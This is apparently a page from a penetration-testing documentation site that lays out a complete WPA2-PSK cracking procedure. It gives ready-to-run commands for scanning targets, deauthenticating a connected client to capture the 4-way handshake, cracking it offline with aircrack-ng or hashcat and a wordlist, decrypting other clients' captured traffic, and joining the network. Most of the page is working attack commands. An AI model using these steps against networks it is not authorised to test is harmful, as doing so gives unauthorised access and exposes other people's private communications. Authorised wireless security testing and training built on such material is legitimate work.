Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

WPA2-PSK authentication uses a 4-way handshake to derive session keys. By forcing a client to reconnect (deauth attack), the handshake can be captured and cracked offline against a wordlist. No active session or decryption of live traffic is needed, only the captured handshake file.

Cracking WPA2

1. Find the WPA2 Network

Scan all bands to identify the target: 
airodump-ng --band abg <WIFI-INTERFACE>

2. Focus on Target Network

Capture traffic and write to file: 
airodump-ng -w wpa2-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>
Keep this running, handshake will be captured when a client reconnects.

3. Deauthenticate a Client

Force a connected client to disconnect and trigger a new handshake: 
sudo aireplay-ng -0 5 -c <CLIENT-MAC> -a <BSSID> <WIFI-INTERFACE>
airodump-ng will display WPA handshake: <BSSID> in the top right when captured.

4. Crack the Handshake

Run a dictionary attack with aircrack-ng: 
sudo aircrack-ng -w <WORDLIST> wpa2-capture-01.cap
Or with hashcat (mode 22000, recommended): 
hcxpcapngtool wpa2-capture-01.cap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 <WORDLIST> --force
Common wordlists: /usr/share/wordlists/rockyou.txt

Decrypt Captured Traffic (airdecap-ng)

With the handshake and the cracked password, decrypt all post-handshake traffic to inspect plaintext communications: 
airdecap-ng -e <SSID> -p <PASSWORD> wpa2-capture-01.cap
Opens a new file wpa2-capture-01-dec.cap. Open in Wireshark to inspect HTTP, DNS, and other traffic from connected clients.

WPA2 Connection

wpa_supplicant config: 
network={
    ssid="SSID"
    psk="password"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}
Connect: 
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
Get an IP address: 
sudo dhclient wlan0 -v